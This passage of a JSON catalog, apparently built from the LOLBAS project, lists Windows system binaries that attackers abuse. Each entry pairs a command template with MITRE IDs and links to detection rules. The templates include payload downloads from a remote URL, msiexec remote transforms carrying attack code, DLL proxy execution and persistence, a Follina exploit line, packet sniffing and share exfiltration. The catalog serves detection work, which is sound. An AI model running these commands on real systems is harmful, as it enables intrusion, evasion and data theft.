files","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"]},{"id":"lolbas:msiexec-exe:4","toolId":"lolbas:msiexec-exe","toolName":"Msiexec.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"msiexec /i {PATH_ABSOLUTE:.msi} TRANSFORMS=\"{REMOTEURL:.mst}\" /qb","description":"Installs the target .MSI file from a remote URL, the file can be signed by vendor. Additional to the file a transformation file will be used, which can contains malicious code or binaries. The /qb will skip user input.","usecase":"Install trusted and signed msi file, with additional attack code as transformation file, from a remote server","mitre":["T1218.007"],"privilege":"user","fullPath":["C:\\Windows\\System32\\msiexec.exe","C:\\Windows\\SysWOW64\\msiexec.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_web_install.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_msiexec_masquerading.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/uninstall_app_using_msiexec.yml"},{"type":"IOC","value":"msiexec.exe retrieving files from Internet"}],"references":["https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/","https://twitter.com/PhilipTsukerman/status/992021361106268161","https://badoption.eu/blog/2023/10/03/MSIFortune.html","https://lolbas-project.github.io/lolbas/Binaries/Msiexec/"]},{"id":"lolbas:msoxmled-exe:0","toolId":"lolbas:msoxmled-exe","toolName":"msoxmled.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"msoxmled.exe /verb open {REMOTEURL}","description":"Downloads payload from remote server using the Microsoft Office XML Editor.","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Program Files\\Microsoft Office\\root\\vfs\\ProgramFilesCommonX64\\Microsoft Shared\\Office16\\msoxmled.exe","C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE14\\msoxmled.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"`msoxmled.exe` making network connections to external URLs"},{"type":"IOC","value":"Unexpected file downloads initiated by `msoxmled.exe`"},{"type":"IOC","value":"Event ID 1 with Image: `msoxmled.exe` and CommandLine: `/verb open`"}],"references":["https://learn.microsoft.com/en-us/answers/questions/4805030/where-is-msoxmled-exe-for-office-professional-2013","https://lolbas-project.github.io/lolbas/Binaries/msoxmled/"]},{"id":"lolbas:netsh-exe:0","toolId":"lolbas:netsh-exe","toolName":"Netsh.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"netsh.exe add helper {PATH_ABSOLUTE:.dll}","description":"Use Netsh in order to execute a .dll file and also gain persistence, every time the netsh command is called","usecase":"Proxy execution of .dll","mitre":["T1546.007"],"privilege":"admin","fullPath":["C:\\WINDOWS\\System32\\Netsh.exe","C:\\WINDOWS\\SysWOW64\\Netsh.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/2b87b26bdc2a84b65b1355ffbd5174bdbdb1879c/detections/endpoint/processes_launching_netsh.yml"},{"type":"Splunk","value":"https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/deprecated/processes_created_by_netsh.yml"},{"type":"IOC","value":"Netsh initiating a network connection"}],"references":["https://freddiebarrsmith.com/trix/trix.html","https://htmlpreview.github.io/?https://github.com/MatthewDemaske/blogbackup/blob/master/netshell.html","https://liberty-shell.com/sec/2018/07/28/netshlep/","https://lolbas-project.github.io/lolbas/Binaries/Netsh/"]},{"id":"lolbas:ngen-exe:0","toolId":"lolbas:ngen-exe","toolName":"Ngen.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"ngen.exe {REMOTEURL}","description":"Downloads payload from remote server using the Microsoft Native Image Generator utility.","usecase":"It will download a remote payload and place it in INetCache.","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\ngen.exe","C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe"],"toolType":"Binary","references":["https://lolbas-project.github.io/lolbas/Binaries/Ngen/"]},{"id":"lolbas:odbcconf-exe:0","toolId":"lolbas:odbcconf-exe","toolName":"Odbcconf.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"odbcconf /a {REGSVR {PATH_ABSOLUTE:.dll}}","description":"Execute DllRegisterServer from DLL specified.","usecase":"Execute a DLL file using technique that can evade defensive counter measures","mitre":["T1218.008"],"privilege":"user","fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b","https://github.com/woanware/application-restriction-bypasses","https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/","https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"]},{"id":"lolbas:odbcconf-exe:1","toolId":"lolbas:odbcconf-exe","toolName":"Odbcconf.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"odbcconf INSTALLDRIVER \"lolbas-project|Driver={PATH_ABSOLUTE:.dll}|APILevel=2\"\nodbcconf configsysdsn \"lolbas-project\" \"DSN=lolbas-project\"","description":"Install a driver and load the DLL. Requires administrator privileges.","usecase":"Execute dll file using technique that can evade defensive counter measures","mitre":["T1218.008"],"privilege":"user","fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b","https://github.com/woanware/application-restriction-bypasses","https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/","https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"]},{"id":"lolbas:odbcconf-exe:2","toolId":"lolbas:odbcconf-exe","toolName":"Odbcconf.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"odbcconf -f {PATH:.rsp}","description":"Load DLL specified in target .RSP file. See the Code Sample section for an example .RSP file.","usecase":"Execute dll file using technique that can evade defensive counter measures","mitre":["T1218.008"],"privilege":"admin","fullPath":["C:\\Windows\\System32\\odbcconf.exe","C:\\Windows\\SysWOW64\\odbcconf.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_odbcconf_response_file_susp.yml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_unusual_process_network_connection.toml"},{"type":"Elastic","value":"https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_network_connection_from_windows_binary.toml"}],"references":["https://gist.github.com/NickTyrer/6ef02ce3fd623483137b45f65017352b","https://github.com/woanware/application-restriction-bypasses","https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/","https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/"]},{"id":"lolbas:offlinescannershell-exe:0","toolId":"lolbas:offlinescannershell-exe","toolName":"OfflineScannerShell.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"OfflineScannerShell","description":"Execute mpclient.dll library in the current working directory","usecase":"Can be used to evade defensive countermeasures or to hide as a persistence mechanism","mitre":["T1218"],"privilege":"admin","fullPath":["C:\\Program Files\\Windows Defender\\Offline\\OfflineScannerShell.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/bea6f18d350d9c9fdc067f93dde0e9b11cc22dc2/rules/windows/process_creation/proc_creation_win_lolbas_offlinescannershell.yml"},{"type":"IOC","value":"OfflineScannerShell.exe should not be run on a normal workstation"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/"]},{"id":"lolbas:onedrivestandaloneupdater-exe:0","toolId":"lolbas:onedrivestandaloneupdater-exe","toolName":"OneDriveStandaloneUpdater.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"OneDriveStandaloneUpdater","description":"Download a file from the web address specified in `HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC`. `ODSUUpdateXMLUrlFromOC` and `UpdateXMLUrlFromOC` must be equal to non-empty string values in that same registry key. `UpdateOfficeConfigTimestamp` is a UNIX epoch time which must be set to a large QWORD such as 99999999999 (in decimal) to indicate the URL cache is good. The downloaded file will be in `%localappdata%\\OneDrive\\StandaloneUpdater\\PreSignInSettingsConfig.json`.","usecase":"Download a file from the Internet without executing any anomalous executables with suspicious arguments","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe","C:\\Program Files (x86)\\Microsoft OneDrive\\OneDriveStandaloneUpdater.exe"],"toolType":"Binary","detection":[{"type":"IOC","value":"HKCU\\Software\\Microsoft\\OneDrive\\UpdateOfficeConfig\\UpdateRingSettingURLFromOC being set to a suspicious non-Microsoft controlled URL"},{"type":"IOC","value":"Reports of downloading from suspicious URLs in %localappdata%\\OneDrive\\setup\\logs\\StandaloneUpdate_*.log files"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml"}],"references":["https://github.com/LOLBAS-Project/LOLBAS/pull/153","https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/"]},{"id":"lolbas:pcalua-exe:0","toolId":"lolbas:pcalua-exe","toolName":"Pcalua.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pcalua.exe -a {PATH:.exe}","description":"Open the target .EXE using the Program Compatibility Assistant.","usecase":"Proxy execution of binary","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcalua.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml"}],"references":["https://twitter.com/KyleHanslovan/status/912659279806640128","https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"]},{"id":"lolbas:pcalua-exe:1","toolId":"lolbas:pcalua-exe","toolName":"Pcalua.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pcalua.exe -a {PATH_SMB:.dll}","description":"Open the target .DLL file with the Program Compatibilty Assistant.","usecase":"Proxy execution of remote dll file","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcalua.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml"}],"references":["https://twitter.com/KyleHanslovan/status/912659279806640128","https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"]},{"id":"lolbas:pcalua-exe:2","toolId":"lolbas:pcalua-exe","toolName":"Pcalua.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pcalua.exe -a {PATH_ABSOLUTE:.cpl} -c Java","description":"Open the target .CPL file with the Program Compatibility Assistant.","usecase":"Execution of CPL files","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcalua.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_pcalua.yml"}],"references":["https://twitter.com/KyleHanslovan/status/912659279806640128","https://lolbas-project.github.io/lolbas/Binaries/Pcalua/"]},{"id":"lolbas:pcwrun-exe:0","toolId":"lolbas:pcwrun-exe","toolName":"Pcwrun.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Pcwrun.exe {PATH_ABSOLUTE:.exe}","description":"Open the target .EXE file with the Program Compatibility Wizard.","usecase":"Proxy execution of binary","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcwrun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml"}],"references":["https://twitter.com/pabraeken/status/991335019833708544","https://twitter.com/nas_bench/status/1535663791362519040","https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/"]},{"id":"lolbas:pcwrun-exe:1","toolId":"lolbas:pcwrun-exe","toolName":"Pcwrun.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Pcwrun.exe /../../$(calc).exe","description":"Leverage the MSDT follina vulnerability through Pcwrun to execute arbitrary commands and binaries. Note that this specific technique will not work on a patched system with the June 2022 Windows Security update.","usecase":"Proxy execution of binary","mitre":["T1202"],"privilege":"user","fullPath":["C:\\Windows\\System32\\pcwrun.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6199a703221a98ae6ad343c79c558da375203e4e/rules/windows/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml"}],"references":["https://twitter.com/pabraeken/status/991335019833708544","https://twitter.com/nas_bench/status/1535663791362519040","https://lolbas-project.github.io/lolbas/Binaries/Pcwrun/"]},{"id":"lolbas:pktmon-exe:0","toolId":"lolbas:pktmon-exe","toolName":"Pktmon.exe","name":"Reconnaissance","source":"LOLBAS","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Reconnaissance"],"command":"pktmon.exe start --etw","description":"Will start a packet capture and store log file as PktMon.etl. Use pktmon.exe stop","usecase":"use this a built in network sniffer on windows 10 to capture senstive traffic","mitre":["T1040"],"privilege":"admin","fullPath":["c:\\windows\\system32\\pktmon.exe","c:\\windows\\syswow64\\pktmon.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml"},{"type":"IOC","value":".etl files found on system"}],"references":["https://binar-x79.com/windows-10-secret-sniffer/","https://lolbas-project.github.io/lolbas/Binaries/Pktmon/"]},{"id":"lolbas:pktmon-exe:1","toolId":"lolbas:pktmon-exe","toolName":"Pktmon.exe","name":"Reconnaissance","source":"LOLBAS","platform":["Windows"],"capability":["Discovery"],"nativeCategory":["Reconnaissance"],"command":"pktmon.exe filter add -p 445","description":"Select Desired ports for packet capture","usecase":"Look for interesting traffic such as telent or FTP","mitre":["T1040"],"privilege":"admin","fullPath":["c:\\windows\\system32\\pktmon.exe","c:\\windows\\syswow64\\pktmon.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_pktmon.yml"},{"type":"IOC","value":".etl files found on system"}],"references":["https://binar-x79.com/windows-10-secret-sniffer/","https://lolbas-project.github.io/lolbas/Binaries/Pktmon/"]},{"id":"lolbas:pnputil-exe:0","toolId":"lolbas:pnputil-exe","toolName":"Pnputil.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"pnputil.exe -i -a {PATH_ABSOLUTE:.inf}","description":"Used for installing drivers","usecase":"Add malicious driver","mitre":["T1547"],"privilege":"admin","fullPath":["C:\\Windows\\system32\\pnputil.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml"}],"references":["https://lolbas-project.github.io/lolbas/Binaries/Pnputil/"]},{"id":"lolbas:presentationhost-exe:0","toolId":"lolbas:presentationhost-exe","toolName":"Presentationhost.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"Presentationhost.exe {PATH_ABSOLUTE:.xbap}","description":"Executes the target XAML Browser Application (XBAP) file","usecase":"Execute code within XBAP files","mitre":["T1218"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Presentationhost.exe","C:\\Windows\\SysWOW64\\Presentationhost.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml"},{"type":"IOC","value":"Execution of .xbap files may not be common on production workstations"}],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/"]},{"id":"lolbas:presentationhost-exe:1","toolId":"lolbas:presentationhost-exe","toolName":"Presentationhost.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"Presentationhost.exe {REMOTEURL}","description":"It will download a remote payload and place it in INetCache.","usecase":"Downloads payload from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\Presentationhost.exe","C:\\Windows\\SysWOW64\\Presentationhost.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost_download.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/6312dd1d44d309608552105c334948f793e89f48/rules/windows/process_creation/proc_creation_win_lolbin_presentationhost.yml"},{"type":"IOC","value":"Execution of .xbap files may not be common on production workstations"}],"references":["https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf","https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/","https://lolbas-project.github.io/lolbas/Binaries/Presentationhost/"]},{"id":"lolbas:print-exe:0","toolId":"lolbas:print-exe","toolName":"Print.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"print /D:{PATH_ABSOLUTE}:file.exe {PATH_ABSOLUTE:.exe}","description":"Copy file.exe into the Alternate Data Stream (ADS) of file.txt.","usecase":"Hide binary file in alternate data stream to potentially bypass defensive counter measures","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"},{"type":"IOC","value":"Print.exe retrieving files from internet"},{"type":"IOC","value":"Print.exe creating executable files on disk"}],"references":["https://twitter.com/Oddvarmoe/status/985518877076541440","https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410","https://lolbas-project.github.io/lolbas/Binaries/Print/"]},{"id":"lolbas:print-exe:1","toolId":"lolbas:print-exe","toolName":"Print.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_ABSOLUTE:.source.exe}","description":"Copy file from source to destination","usecase":"Copy files","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"},{"type":"IOC","value":"Print.exe retrieving files from internet"},{"type":"IOC","value":"Print.exe creating executable files on disk"}],"references":["https://twitter.com/Oddvarmoe/status/985518877076541440","https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410","https://lolbas-project.github.io/lolbas/Binaries/Print/"]},{"id":"lolbas:print-exe:2","toolId":"lolbas:print-exe","toolName":"Print.exe","name":"Copy","source":"LOLBAS","platform":["Windows"],"capability":["File Copy"],"nativeCategory":["Copy"],"command":"print /D:{PATH_ABSOLUTE:.dest.exe} {PATH_SMB:.source.exe}","description":"Copy File.exe from a network share to the target c:\\OutFolder\\outfile.exe.","usecase":"Copy/Download file from remote server","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\print.exe","C:\\Windows\\SysWOW64\\print.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_print_remote_file_copy.yml"},{"type":"IOC","value":"Print.exe retrieving files from internet"},{"type":"IOC","value":"Print.exe creating executable files on disk"}],"references":["https://twitter.com/Oddvarmoe/status/985518877076541440","https://www.youtube.com/watch?v=nPBcSP8M7KE&lc=z22fg1cbdkabdf3x404t1aokgwd2zxasf2j3rbozrswnrk0h00410","https://lolbas-project.github.io/lolbas/Binaries/Print/"]},{"id":"lolbas:printbrm-exe:0","toolId":"lolbas:printbrm-exe","toolName":"PrintBrm.exe","name":"Download","source":"LOLBAS","platform":["Windows"],"capability":["File Download"],"nativeCategory":["Download"],"command":"PrintBrm -b -d {PATH_SMB:folder} -f {PATH_ABSOLUTE:.zip}","description":"Create a ZIP file from a folder in a remote drive","usecase":"Exfiltrate the contents of a remote folder on a UNC share into a zip file","mitre":["T1105"],"privilege":"user","fullPath":["C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml"},{"type":"IOC","value":"PrintBrm.exe should not be run on a normal workstation"}],"references":["https://twitter.com/elliotkillick/status/1404117015447670800","https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/"]},{"id":"lolbas:printbrm-exe:1","toolId":"lolbas:printbrm-exe","toolName":"PrintBrm.exe","name":"ADS","source":"LOLBAS","platform":["Windows"],"capability":["Defense Evasion","File Write"],"nativeCategory":["ADS"],"command":"PrintBrm -r -f {PATH_ABSOLUTE}:hidden.zip -d {PATH_ABSOLUTE:folder}","description":"Extract the contents of a ZIP file stored in an Alternate Data Stream (ADS) and store it in a folder","usecase":"Decompress and extract a ZIP file stored on an alternate data stream to a new folder","mitre":["T1564.004"],"privilege":"user","fullPath":["C:\\Windows\\System32\\spool\\tools\\PrintBrm.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/35a7244c62820fbc5a832e50b1e224ac3a1935da/rules/windows/process_creation/proc_creation_win_lolbin_printbrm.yml"},{"type":"IOC","value":"PrintBrm.exe should not be run on a normal workstation"}],"references":["https://twitter.com/elliotkillick/status/1404117015447670800","https://lolbas-project.github.io/lolbas/Binaries/PrintBrm/"]},{"id":"lolbas:provlaunch-exe:0","toolId":"lolbas:provlaunch-exe","toolName":"Provlaunch.exe","name":"Execute","source":"LOLBAS","platform":["Windows"],"capability":["Execution"],"nativeCategory":["Execute"],"command":"provlaunch.exe LOLBin","description":"Executes command defined in the Registry. Requires 3 levels of the key structure containing some keywords. Such keys may be created with two reg.exe commands, e.g. `reg.exe add HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\LOLBin\\dummy1 /v altitude /t REG_DWORD /d 0` and `reg add HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands\\LOLBin\\dummy1\\dummy2 /v Commandline /d calc.exe`. Registry keys are deleted after successful execution.","usecase":"Executes arbitrary command","mitre":["T1218"],"privilege":"admin","fullPath":["c:\\windows\\system32\\provlaunch.exe"],"toolType":"Binary","detection":[{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_potential_abuse.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_provlaunch_susp_child_process.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml"},{"type":"Sigma","value":"https://github.com/SigmaHQ/sigma/blob/9cb124f841c4358ca859e8474d6e7bb5268284a2/rules/windows/registry/registry_set/registry_set_provisioning_command_abuse.yml"},{"type":"IOC","value":"c:\\windows\\system32\\provlaunch.exe executions"},{"type":"IOC","value":"Creation/existence of HKLM\\SOFTWARE\\Microsoft\\Provisioning\\Commands 